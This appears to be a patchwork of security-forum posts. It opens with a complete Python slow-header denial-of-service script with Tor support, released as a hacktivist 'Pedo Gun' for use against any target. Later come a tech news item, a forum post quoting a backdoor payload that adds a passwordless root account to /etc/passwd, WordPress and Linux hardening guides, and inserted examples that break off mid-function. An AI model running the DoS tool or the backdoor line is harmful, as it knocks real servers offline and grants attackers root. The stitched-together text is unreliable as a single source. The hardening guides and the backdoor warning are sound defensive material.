useragents = [
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
    "Opera/9.20 (Windows NT 6.0; U; en)",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)",
    "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0",
    "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13",
    "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
    "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)",
    "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7"
]


class httpPost(Thread):
    def __init__(self, host, port, tor):
        Thread.__init__(self)
        self.host = host
        self.port = port
        self.socks = socks.socksocket()
        self.tor = tor
        self.running = True

    def _send_http_post(self, pause=10):
        global stop_now
        self.socks.send("GET / HTTP/1.1\r\n"
                        "Host: %s\r\n"
                        "User-Agent: %s\r\n"
                        "Connection: keep-alive\r\n"
                        "Keep-Alive: 900\r\n"
                        "Range: bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-"
                        "Accept-Encoding: gzip, deflate, compress" % (self.host, random.choice(useragents)))
        for i in range(0, 9999):
            if stop_now:
                self.running = False
                break
            p = "X-"+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+": "+random.choice(string.letters+string.digits)
            print term.BOL+term.UP+term.CLEAR_EOL+"HEADER: %s" % p+term.NORMAL
            self.socks.send(p+"\r\n")
            time.sleep(random.uniform(30, 40))
        self.socks.close()

    def run(self):
        while self.running:
            while self.running:
                try:
                    if self.tor:
                        self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
                    self.socks.connect((self.host, self.port))
                    print term.BOL+term.UP+term.CLEAR_EOL+"Connected to host..."+ term.NORMAL
                    break
                except Exception, e:
                    if e.args[0] == 106 or e.args[0] == 60:
                        break
                    print term.BOL+term.UP+term.CLEAR_EOL+"Error connecting to host..."+ term.NORMAL
                    time.sleep(1)
                    continue
            while self.running:
                try:
                    self._send_http_post()
                except Exception, e:
                    if e.args[0] == 32 or e.args[0] == 104:
                        print term.BOL+term.UP+term.CLEAR_EOL+"Thread broken, restarting..."+ term.NORMAL
                        self.socks = socks.socksocket()
                        break
                    time.sleep(0.1)
                    pass


def usage():
    print "./ch.py -t <target> [-r <threads> -p <port> -T -h]"
    print " -t|--target <Hostname|IP>"
    print " -r|--threads <Number of threads> Defaults to 256"
    print " -p|--port <Web Server Port> Defaults to 80"
    print " -h|--help Shows this help\n"
    print "Eg. ./ch.py -t 192.168.1.100 -r 256\n"


def main(argv):
    try:
        opts, args = getopt.getopt(argv, "hTt:r:p:", ["help", "tor", "target=", "threads=", "port="])
    except getopt.GetoptError:
        usage()
        sys.exit(-1)

    global stop_now
    target = ''
    threads = 256
    tor = False
    port = 80

    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
            sys.exit(0)
        if o in ("-t", "--target"):
            target = a
        elif o in ("-r", "--threads"):
            threads = int(a)
        elif o in ("-p", "--port"):
            port = int(a)

    if target == '' or int(threads) <= 0:
        usage()
        sys.exit(-1)

    print term.DOWN + term.RED + "/*" + term.NORMAL
    print term.RED + " * Target: %s Port: %d" % (target, port) + term.NORMAL
    print term.RED + " * Threads: %d" % (threads) + term.NORMAL
    print term.RED + " */" + term.DOWN + term.DOWN + term.NORMAL

    rthreads = []
    for i in range(threads):
        t = httpPost(target, port, tor)
        rthreads.append(t)
        t.start()

    while len(rthreads) > 0:
        try:
            rthreads = [t.join(1) for t in rthreads if t is not None and t.isAlive()]
        except KeyboardInterrupt:
            print "\nShutting down threads...\n"
            for t in rthreads:
                stop_now = True
                t.running = False


if __name__ == "__main__":
    print "\n/*"
    print "********"
    print "*"+term.RED + " To Catch a Predator "+term.NORMAL+"*"
    print "********"
    print " */\n"
    main(sys.argv[1:])

Pastebin: #OpDarkNet - Offical Release: Pedo Gun - PEW PEW - Pastebin.com
-
Wireless charging has become a reality by Radu Eftimie | 21 October 2011 Many people would probably agree that nothing is worse, on a day when your schedule is full, than your mobile phone running out of battery. This problem seems to have found its solution already, thanks to Powermat technology, which charges mobile devices on the go, writes Mashable. Wireless battery charging technology has existed since 2009, and the company has been trying to improve the system ever since. Powermat works on the principle of energy transfer through magnetic induction. Energy is transferred from a transmitter built into the base stand of the device to a receiver that attaches (through a dedicated connector) to the phone or other gadget that needs charging. The energy transfer through the magnetic field is interrupted automatically once the device's battery is fully charged, to avoid wasting energy. In the future, the company, which now works with Duracell, General Motors and other big names from several industries, says the wireless charging system will become available in airports, hotels, cafes and company offices, as well as in every home. Powermat also states that the technology will become dominant within 10 years. Source and video: Incarcarea wireless a devenit realitate | Hit.ro
-
It's from the forum, I don't know what can be done; I hope the encoding of the tables in the database won't have to be changed. kwe said he'll take care of it when he has time, I'll keep pestering him.
-
Hosting "professional": F:\xampp\htdocs...
-
Bypassing Windows 7 Kernel ASLR Authored by Stefan Le Berre Whitepaper called Bypassing Windows 7 Kernel ASLR. In this paper, the author explains every step to code an exploit with a useful kernel ASLR bypass. Successful exploitation is performed on Windows 7 SP0 / SP1. Download: http://dl.packetstormsecurity.net/papers/bypass/NES-BypassWin7KernelAslr.pdf
-
I think it's fake, at least that's what some people who analysed it say. It creates a root account without a password.
-
That "evil" hex ends with: "/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD" It sends the data wherever you tell it to: send(s, buffer, strlen(buffer), 0) This is executed locally... execl("/bin/sh", "sh", "-c", evil, 0); So I think it's fake, a backdoor, so don't run it (at least NOT as root). Or remove: if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); Although this may be needed for the shell. I don't know what the first instructions do; if I have time and manage to disassemble the data from the hex, maybe I'll figure out whether it infects or not. For now I'm not sure whether it's a backdoor or not; run it as a normal user and there shouldn't be any problems.
-
10 Steps to Securing Your WordPress Installation Fouad Matin on Sep 16th 2011 with 39 comments
Tutorial Details Program: WordPress Version: 3.2.1 Difficulty: Beginner Estimated Completion Time: 20 - 30 minutes

WordPress is open source, which means that everyone, including hackers with malicious intent, can scour the source code looking for holes in its security. That is why I'm going to show you some good precautionary steps to take to protect you, your WordPress installation and, most importantly, your users.

#1 Remove the Admin Superuser
Probably the easiest thing you can do to protect yourself is to start by changing or removing the admin superuser. Anyone who uses WordPress knows that there is a user called admin with top-level privileges, and hackers know it too. If the username is admin, only the password is left to guess. Create a new administrative account, this time with a different name, and then delete the admin account. In fact, what I would personally recommend is to create an administrative account with a very complex username and password (something like x7duEls91*), store it somewhere safe, and make another account under your own name, without administrative powers, for publishing content. The admin account is essentially only needed to manage themes, plugins and other aspects of the site that do not need to change on a daily basis; an editor account is sufficient for everything else.
"Treat your password like your toothbrush. Don't let anybody else use it, and get a new one every six months." ~Clifford Stoll

#2 Choose a Strong Password
Regardless of the type of site you are running, you may be at risk of a brute-force attack. Deleting the admin username in the first step probably deterred most attackers, but there are always those who are very persistent or who already know your username. The next step is to choose a long and diverse password. A good way to determine whether or not your password is strong is to enter it into an online password checker like passwordmeter.com, or to generate a random password.

#3 Secure Your Password
I also prefer to take extra precautions when protecting my blog, and installing plugins can add an extra layer of security. There are numerous plugins that handle the password and login aspects of WordPress. One plugin that I find very useful is Login LockDown; it records the IP address and timestamp of every failed login, and blocks an IP address after a certain number of failed logins. This plugin is especially helpful when it comes to defending yourself against a brute-force attack: most attackers give up on a site if they are IP-banned every 5 minutes while running their brute-force program.

#4 Always Update WordPress
As I said earlier, WordPress is open source, which makes it an easier target for hackers. Nearly 60 million sites use WordPress, so when Automattic pushes out an update, the sooner you update your site the better, because each new release also publishes the vulnerabilities it fixed. Updating your WordPress installation doesn't take long either; according to WordPress it takes 5 minutes to complete.

#5 Hide WordPress Version
Let's say that you forget to update your WordPress installation, or just don't have 5 minutes to spare. Your WordPress version gives hackers a good idea of how they can attack your site, especially if it's outdated. By default, WordPress displays the version, because the project wants it for metrics on how many people are using which version. However, this is like putting up a bright red sign on your site telling hackers what to do. If you're using a premium theme, odds are that the developer took the liberty of disabling it for you, but it's always better to be sure. Open your theme's functions.php file and drop in this line of code:
<?php remove_action('wp_head', 'wp_generator'); ?>

#6 Change File Permissions
It is very important that you have the proper file permissions to ensure your site's security. I recommend that you restrict your file permissions down to the bare minimum, a CHMOD value of 744, which essentially makes the files read-only to everyone except you. Just open your FTP program, right-click the folder or file and click on "File Permissions". If it is 777, you are very lucky that you haven't already been hacked. You should change the CHMOD value to 744, giving only the "owner" full access.

#7 Whitelist
Whitelists allow you to manage who is able to access certain parts of your website. It's like building the Great Wall of China around your admin folder, so that no one except you can access it. We do this using the .htaccess file. Navigate to your /wp-admin/ folder and check whether there is already a .htaccess file; if there isn't one, just make one. If there is already one there, I suggest making a backup of it before doing any edits. Please make sure you are in the wp-admin folder, and not the root folder. Paste the following code into the .htaccess file:
AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "WordPress Admin Access Control"
AuthType Basic
<LIMIT GET>
order deny,allow
deny from all
# Whitelist Your IP address
allow from xx.xx.xx.xxx
# Whitelist Your Office's IP address
allow from xx.xx.xx.xxx
# Whitelist Your IP address While You're Traveling (Delete When You Come Back Home)
allow from xx.xx.xx.xxx
</LIMIT>
Replace the xx's with your IP address, which you can find out at WhatsMyIP.org. Now every time you are going to log in from somewhere other than the places you added to your .htaccess file, you have to add the new IP address first.

#8 Backup
Regardless of the level of security of your WordPress site, it is a good habit to always back up your site. There are many ways to do this. You can take advantage of cron jobs, if your hosting company provides them, by using this script:
DBNAME=DB_NAME
DBPASS=DB_PASSWORD
DBUSER=DB_USER
EMAIL="you@your_email.com"
mysqldump --opt -u $DBUSER -p$DBPASS $DBNAME > backup.sql
gzip backup.sql
DATE=`date +%Y%m%d` ; mv backup.sql.gz $DBNAME-backup-$DATE.sql.gz
echo 'BLOG BACKUP:Your Backup is attached' | mutt -s "MySQL Backup" -a $DBNAME-backup-$DATE.sql.gz -- $EMAIL
rm $DBNAME-backup-$DATE.sql.gz
Alternatively, you can use VaultPress, a service from Automattic. If you're interested in learning more about VaultPress, then I recommend checking out this tutorial. The easiest way to go is to just log into the admin panel, navigate to Tools and then click on Export. This makes your life easier, especially when you need to set your WordPress up again.

#9 Hide Your Plugins
Putting a blank index file into your /wp-content/plugins/ folder will hide all of your plugins. Some of you are probably thinking, "Who cares if someone can see my plugins?". Well, plugins can tell hackers how to hack your site, or at least whether it is hackable. Without that file, the plugins are clearly visible to anyone who navigates to the /wp-content/plugins folder. If a hacker sees no security plugins, then they immediately know that this will be an easy job. Adding a blank index.html to the plugins folder is like putting a security sign on your lawn: it doesn't matter whether you actually have the security system, as long as the hacker doesn't know, he will be less inclined to try anything.

#10 Analyze Server Logs
The best security tool, regardless of whichever plugin or software you install, is you. In order to be confident that you are completely protected, you have to take a proactive approach to your website's security. Three times a day I check my server logs and web analytics to see if there is any unusual behavior.

You're Set!
Source: http://wp.tutsplus.com/tutorials/10-steps-to-securing-your-wordpress-installation/
-
Linux Security Basics Published: Monday, August 31st, 2009 by Sam Kleinman
One of the most daunting prospects of administering your own server on a public network is dealing with your server's security. While security threats in a networked world are real and it is always important to be mindful of security issues, protecting against possible attacks is often a matter of exercising basic common sense and adhering to some general best practices. This guide takes a broad overview of common security concerns and provides a number of possible solutions to common security problems. You are encouraged to consider deploying some of these measures to "harden" your server against possible attacks. It's important to remember that all of the solutions we present in this document are targeted at specific kinds of attacks, which themselves may be relevant only in specific configurations. Security solutions need to be tailored to the kind of services that you're providing and the software you're running, and the decision whether or not to deploy a specific security solution is often a matter of personal discretion and cost-benefit analysis. Perhaps most importantly, it should be understood that security is a process, not a product (credit to Bruce Schneier). There is no "magic bullet" set of guidelines that can be followed to ensure the security of any system. Threats are constantly evolving, so vigilance is required on the part of network administrators to prevent unauthorized access to systems.

Contents
Keep Systems and Software Up To Date
Disable Unused Services
Lock Down SSH
Limit Root and System Users' Access
Use a Firewall to Block Unwanted Traffic
Use Denyhosts or Fail2Ban to Prevent Password Attacks
Encrypt Sensitive Data
Best Practices with Databases

Keep Systems and Software Up To Date
One of the most significant sources of security vulnerabilities is systems running out-of-date software with known security holes.
Make a point of using your system's package management tools to keep your software up to date; this will greatly assist in avoiding easily preventable security intrusions. Running system updates with the package management tool, using "apt-get update && apt-get upgrade" (for Debian and Ubuntu Systems) or "yum update" (for CentOS and Fedora systems) is simple and straightforward. This practice ensures that if your distribution maintains active security updates, your system will be guarded against many security holes in commonly used software packages. System update tools will, however, not keep software up to date that you've installed outside of package management. This includes software that you've compiled and installed "by hand" (e.g. with "./configure && make && make install") and web-based applications that you've installed from a software developer's site, as is often the case with applications like WordPress and Drupal. Also excluded from protection will be libraries and packages you've installed with supplementary package management tools like Ruby's Gems, Perl's CPAN tool, Python easy_install, and Haskell Cabal. You will have to manage the process of keeping these files up to date yourself. The method you use to make sure that your entire system is kept up to date is a matter of personal preference, and depends on the nature of your workflow. We would recommend trying very hard to use the versions of software provided by your operating system or other programming platform-specific package management tools. If you must install from "source," we would recommend that you save the tarballs and source files for all such software in /src/ or ~/src/ so that you can keep track of what software you've installed in this manner. Often, you can remove a manually compiled application by issuing "make uninstall" in the source repository (directory). 
Additionally, it may be helpful to maintain a list of manually installed software, with version numbers and download locations. You may also want to investigate packaging your own software so that you can install it with apt, yum or pacman. Because of the complexity of maintaining software outside of the system's package management tools we strongly recommend avoiding manually installing software unless absolutely necessary. Your choice in a Linux distribution should be heavily biased by the availability of software in that distro's repositories for the systems you need to run on your server. Disable Unused Services One common avenue for attack involves exploiting unused applications. In general we recommend disabling daemons (services) that you're not actively using, developing, or testing. Using "/etc/init.d/[service] stop" or "/etc/rc.d/[service] stop", depending on your distribution, to deactivate unused services can prevent these services from being exploited later. Please note that services that are configured to start at system boot will run again should you reboot your server, so it may be safer to disable them from automatically starting using your distribution's particular method for doing so. Not only will unused services no longer consume system resources, if there are any security vulnerabilities in these services, would-be attackers will be unable to exploit them. Any service that you're not using should be turned off. To see what processes you're currently running, we recommend using the htop tool. Install with "apt-get install htop", "yum install htop" or "pacman -Sy htop". Lock Down SSH SSH, the secure shell service, is the main avenue we use to interact with servers remotely. While SSH provides exceptional encryption and security for users, it also provides a great deal of access to your server and thus represents an appealing target for an attacker. 
To counteract the possibility of having your servers compromised with an SSH attack, we recommend taking the following steps.
First, disable root logins via SSH. Since the root username is predictable and provides complete access to your system, providing unfettered access to this account over SSH is unwise. Edit the /etc/ssh/sshd_config file to modify the PermitRootLogin option as follows:
PermitRootLogin no
If you need to gain root access to your system you can (and should) use tools like su and sudo to do so without logging in as root.
Second, disable password authentication. Generate and use SSH keys to log into your system. Without passwords enabled, attackers will need to guess (or steal) your SSH private key in order to gain access to your server. In the file /etc/ssh/sshd_config, modify PasswordAuthentication as follows:
PasswordAuthentication no
If you do not have SSH keys generated you will have to generate them on your own machine before disabling password authentication. To generate SSH keys for your host, issue the following command on your local system if you're using Mac OS X or Linux locally:
ssh-keygen
Answer the program's inquiries; generally the defaults are acceptable. This will generate an SSH key using the RSA algorithm. If you want to use the DSA algorithm, append "-t dsa" to the command. Your SSH key will be generated with the private key in ~/.ssh/id_rsa and the public key in ~/.ssh/id_rsa.pub. You will want to copy the public key into the ~/.ssh/authorized_keys file on the remote machine, using the following commands (replacing your own SSH user and host names):
scp ~/.ssh/id_rsa.pub user@hostname.com:/home/user/.ssh/uploaded_key.pub
ssh user@hostname.com "cat ~/.ssh/uploaded_key.pub >> ~/.ssh/authorized_keys"
If you're using PuTTY in Windows, note that it has the ability to generate keys using puttygen that you can upload to your server. You can download puttygen from the PuTTY Homepage.
If you have a problem logging in you will need physical access or out-of-band console access to your server to restore SSH functionality. You can use the Linode shell (LISH) to access your server's console.

Limit Root and System Users' Access
In general, users and applications that do not have access to a system on your server, either by virtue of limited access rules or by limited abilities to log into the system, cannot do any harm to the system. Additionally, one common way of compromising a system is to trick the system into thinking that a user has access rights greater than what they actually have. While these "escalation attacks" are relatively uncommon and are often patched rather quickly, they are only a threat when there are accounts that can be exploited. To address these possible threats we suggest the following best practices with regards to managing your user accounts:
Don't give people user accounts if they don't need them. There are often ways to provide access to specific servers without giving users accounts with even limited access to the system. Giving someone a shell account on your system should be seen as a last resort in most cases.
If you need to have multiple administrators for a system, rather than share a single root password among many people, use sudo to give "root access" but force users to authenticate with their own password. The sudo command also provides more detailed logging, so you know which root commands were issued by which user.
Leverage user groups and permissions to provide granular access control when you have no option but to give a user an account on your system.
Disable unused system user accounts, either by removing the account outright with the userdel command, or by locking the user account with "usermod --lock LOGIN-NAME" until the user needs access again (achieved with "usermod --unlock").
Limiting access to your servers and adhering to best practices with regards to administrative access and user account management won't guard against escalation attacks or all possible intrusions. However, by limiting the size of your "shadow" you decrease the likelihood of becoming the victim of many kinds of attacks. Use a Firewall to Block Unwanted Traffic As the term "firewall" has fallen into common non-technical usage, the specific role of a firewall solution as part of a larger security plan has become somewhat unclear. Firewalls are simple traffic filters that can be used to limit and constrain inbound traffic to your Linode. The aim is to prevent all traffic arriving from certain IP addresses or over certain ports in situations where you know that traffic is unwanted or malicious. On the whole, firewall settings and configurations are beyond the scope of this document. We recommend that you review specific guides for firewall configuration to learn how to configure your firewall correctly for your use. In this section, we hope to explain some basic firewall settings that you can use to prevent most intrusions. Although there are numerous packages on Linux systems that enable efficient and effective configuration of firewalls, the actual firewalls are created using iptables. This uses the packet filtering capabilities of the Linux kernel itself. This means that the firewall rules are enforced very efficiently. Nevertheless, the firewall that you configure can be as open or as restrictive as you need. It's sometimes difficult to decide what the best strategy is for deploying an effective firewall. With the understanding that your firewall setup needs must take the actual uses of your server and its users into account, we offer the following list as potential strategies for deploying a firewall. Identify the services that you're using and close all ports on all public IP addresses, except the ones that the services you use listen on. 
The most common standard ports include: web servers on port 80, ssh on port 22, smtp on port 25. If there are any security vulnerabilities in software running on other ports, or intruders are scanning for open ports, the firewall will reject this traffic before it can reach your system. Disadvantages: this filter can be confusing if your suite of services changes regularly, and you may end up unintentionally locking yourself out of services that you want to use, which can be hard to troubleshoot.
Watch access logs for suspicious behavior and block inbound traffic from IPs and IP ranges that are attacking your server. If you're getting malicious activity from a specific IP address, then it's probably safe to block all traffic from that IP, at least for a while. Disadvantages: people can change their IP addresses to get around these rules, and blocking individual addresses from accessing your server can't prevent attacks before they happen.
Block inbound traffic on sensitive ports, except from IP addresses that you know are good. Some services, like SSH, can grant an attacker a great deal of access to the system, while HTTP servers like Apache are designed to be accessed by the public at large. This is a "whitelisting" strategy and can be used to effectively secure services like SSH and database servers that are accessed over a private network. If you know where "good" traffic is likely to originate from, you can prevent would-be attackers from gaining access to your machines without hindering the good traffic. Disadvantages: this strategy is only effective if you have a limited number of "good" sources of traffic, and is ineffective at securing services that need to be publicly accessible.
These rules can -- and perhaps should -- be deployed to varying degrees as part of a larger security strategy. Firewalls alone don't prevent malicious behavior and are not a security cure-all, but they can be quite effective at preventing some attacks.
When deciding to deploy firewall rules, the decision often comes down to the following questions: "will this rule impede traffic that I actually want to serve?", "will this rule make it more difficult to use the server as I want to?", and finally "will this rule successfully block traffic that I don't want to serve?" The answers to these questions often vary in response to the services you're providing and the way you use your server, but we hope that the above guidelines provide a productive starting point for your firewall deployment.

Use Denyhosts or Fail2Ban to Prevent Password Attacks
The DenyHosts and Fail2Ban applications (for which packages should be included in your distribution's software repository) help prevent dictionary attacks on your server. The basic concept is simple: these programs watch for attempted logins, and if your server is receiving multiple failed login attempts from the same IP address, they insert firewall rules that block traffic from the attacker's IP address. The assumption is that "good" users are very likely to get their password right in fewer than 3-5 attempts, and that anyone who submits an incorrect password more than 3-5 times is trying to break into the system. While there is the potential for false positives, the "bans" can be temporary, and are easily reversed by the administrator if necessary. The number of allowed attempts and the length of time the resulting ban remains in effect are configurable by the system administrator. Attempted logins can be monitored on a variety of protocols, including HTTP Auth, SMTP, and SSH. While this approach to restricting traffic won't prevent a compromised password from being used to break into a system, it can reduce the risk that a system user's weak password poses to the server as a whole.
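The Login LockDown plugin described in step #3 of the WordPress article above and the DenyHosts/Fail2Ban paragraph here rely on the same detection logic: count failed logins per source address inside a time window and block the address once a threshold is crossed. The script below is an added example (not code from any of those projects) that runs that logic over constructed sshd log lines; the sample log, the `find_bans` function and its `maxretry`/`findtime`/`bantime` defaults are my own.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of OpenSSH syslog lines (not a real capture): two
# guessing addresses and one legitimate user who mistypes once.
SAMPLE_AUTH_LOG = """\
Oct 23 21:47:01 www sshd[4011]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2
Oct 23 21:47:03 www sshd[4011]: Failed password for invalid user admin from 203.0.113.7 port 51236 ssh2
Oct 23 21:47:05 www sshd[4013]: Failed password for root from 203.0.113.7 port 51240 ssh2
Oct 23 21:47:09 www sshd[4020]: Failed password for sam from 198.51.100.4 port 40022 ssh2
Oct 23 21:47:15 www sshd[4020]: Accepted publickey for sam from 198.51.100.4 port 40022 ssh2
Oct 23 21:50:00 www sshd[4031]: Failed password for invalid user test from 192.0.2.9 port 33001 ssh2
Oct 23 22:05:00 www sshd[4040]: Failed password for invalid user test from 192.0.2.9 port 33002 ssh2
Oct 23 22:20:00 www sshd[4045]: Failed password for invalid user test from 192.0.2.9 port 33003 ssh2
"""

# Matches the "Failed password" line sshd writes for a rejected password attempt.
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failed_logins(log_text, year=2011):
    """Return a list of (timestamp, ip, user) for every failed-password line.

    Syslog timestamps carry no year, so the caller supplies one.
    """
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue  # accepted logins and unrelated lines are ignored
        ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
        events.append((ts, m.group("ip"), m.group("user")))
    return events


def find_bans(log_text, maxretry=3, findtime=600, bantime=1800):
    """Fail2Ban-style rule: ban an IP that fails maxretry times within findtime seconds.

    Returns {ip: ban_expiry_datetime}. Failures older than findtime drop out of
    the window, so slow, spread-out attempts do not trigger a ban; that is the
    false-positive trade-off the article mentions.
    """
    window = timedelta(seconds=findtime)
    recent = defaultdict(deque)  # ip -> timestamps of failures still in the window
    bans = {}
    for ts, ip, _user in parse_failed_logins(log_text):
        if ip in bans and ts < bans[ip]:
            continue  # already banned; the firewall rule would drop this traffic
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()  # expire failures outside the window
        if len(q) >= maxretry:
            bans[ip] = ts + timedelta(seconds=bantime)
            q.clear()
    return bans


def iptables_rules(bans):
    """Render the firewall rules such a tool inserts, one DROP per banned IP."""
    return ["iptables -I INPUT -s %s -j DROP" % ip for ip in sorted(bans)]


if __name__ == "__main__":
    banned = find_bans(SAMPLE_AUTH_LOG)
    for ip, until in sorted(banned.items()):
        print("ban %s until %s" % (ip, until.isoformat()))
    for rule in iptables_rules(banned):
        print(rule)
```

With the defaults only 203.0.113.7 is banned: 192.0.2.9 spaces its attempts 15 minutes apart and never reaches three failures inside the 10-minute window, which is why the window length matters as much as the retry count.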
Encrypt Sensitive Data
If most "best security practices" come down to exercising a fair bit of paranoia over your data and systems, then implementing data encryption represents the most severe expression of this paranoia. Well-tuned access control lists are often quite effective at preventing most casual abuse, and there is always some resource overhead for encrypting and decrypting data. Nevertheless, if you're storing truly sensitive data, it's often quite prudent to encrypt it. There are a number of different options for accomplishing this goal. First, encrypt individual files using PGP and the tools provided by the GNU Privacy Guard package in your distribution (frequently, as "gpg"). PGP is very secure, and if you already use PGP keys and have a small number of sensitive files, this can be quite workable. This prevents casual snoopers from reading the contents of a file, even if they have read access to it, though it only works on a file-by-file basis. Additionally, it can sometimes be confusing to make sure you're encrypting data with the proper public key. The second option is more advanced. It requires running your own kernel under PV-GRUB, and using the dm-crypt kernel module to encrypt the contents of the disks. This takes a toll on disk performance, and requires you to enter a password on boot in order to access your files. The disadvantages are plenty: you are responsible for maintaining an up-to-date kernel, and if you lose your password all your files will be unrecoverable. Additionally, disk-level encryption protects against a very narrow set of threats: physical attacks against the hardware and unforeseen (and unlikely) issues with the virtualization engine in use. Once a machine with disk-level encryption is booted and running -- aside from the slight performance hit -- it is indistinguishable from an unencrypted system in terms of user experience.
The final option, and perhaps the best middle ground, is to use a system like "EncFS" which creates an encrypted filesystem in user-space (using the FUSE interface). This system writes your files in an encrypted format to the disk, and when you mount the filesystem you're provided with a usable and unencrypted view of it. When you unmount the file system, you only have encrypted files. EncFS doesn't protect meta-data information like file size, permissions, and last-edited time, but is otherwise very secure. For sensitive files, this prevents the additional complexity of managing individual encrypted files, while still allowing for high quality data security. Again, from a holistic perspective, encrypting in this manner provides minimal benefit for most use cases and comes with a great deal of overhead. Nevertheless, there are some situations where encryption makes a lot of sense, particularly when you're managing very sensitive data on networked machines. Consider encryption as a possible tool among many options for creating a more secure environment. Best Practices with Databases One common class of security issues involves the applications that you develop and run on your server, as opposed to all of the system software that your application depends upon. There are some basic guidelines that you may want to follow as you develop applications. Distrust all inputs by sanitizing all text and content that users could put into the system. Most programming languages have "string scrubber" tools that you can use to strip out all code, scripts, and unwanted HTML tags. Use these to prevent anyone from using your site to publish malicious code, or use code to exploit your server. If your application is written in Perl, consider enabling warnings and "taint mode" by starting your program with "#!/usr/bin/perl -tw". Taint mode requires all input from external sources be tested with a regular expression before it may be used in your program. 
This means you won't accidentally use an untrusted input without (hopefully) running a sane regular expression check on it to make sure it contains only valid data. If your application is written in PHP, consider using the mysql_real_escape_string and htmlentities functions to sanitize user input such as GET and POST data. Using the above "string scrubbers" are a great way to begin securing your PHP code. You can find more information and examples on the mysql_real_escape_string and htmlentities manual pages. Sanitize database inputs to prevent SQL injection attacks when using a database system. One typical approach involves using prepared statements with the database interface. This prevents your database from generating unexpected output, and makes it impossible for users to perform unintended modification to your database or to access unauthorized content from your system. Authenticate all requests for secure information, rather than passing or storing IsAuthenticated or IsPrivileged status to the user. In short, avoid storing any information in cookies or in the HTTP query string that you don't want the users to be able to edit. These tips for coding practices, and indeed all of the security tips that we present here, are simply a starting place for ensuring that your system remains protected against intrusions from malicious users. Nevertheless, from our experience even these small suggestions will help keep your system secure from many common exploits. We hope that this guide has presented a number of manageable approaches that you can deploy in order to help ensure that your system remains secure. Sursa: Linux Security Basics
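The three application-level points in the post above (prepared statements against SQL injection, scrubbing stored content before it is rendered, and deciding privilege server-side instead of trusting an IsAuthenticated-style cookie) are shown together in the following example. It is added here and is not code from the original guide or the forum post; it uses only the Python standard library, an in-memory SQLite database, and constructed sample rows, cookies and session tokens.

```python
"""
Added example (not from the original post): the string-built query the post
warns about beside its prepared-statement replacement, an output scrubber for
stored content, and a privilege check that ignores client-supplied flags.
Everything here is constructed sample data; there is no real site behind it.
"""
import html
import sqlite3

# Constructed server-side session store: token -> user. In a real deployment this
# would live in a database or cache, keyed by a random token set in a cookie.
SESSIONS = {"tok-abc": "alice", "tok-root": "root"}


def make_db() -> sqlite3.Connection:
    """Build a constructed, in-memory users table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, bio TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            ("alice", "likes gardening", 0),
            ("bob", "<script>alert(1)</script>", 0),  # constructed hostile bio
            ("root", "site administrator", 1),
        ],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, name: str) -> list:
    """The pattern to avoid: user input pasted straight into the SQL text.

    A value containing a quote changes the structure of the query, so a
    lookup for one user can return every row in the table.
    """
    query = "SELECT name FROM users WHERE name = '%s'" % name
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Prepared statement: the driver binds `name` as data, never as SQL."""
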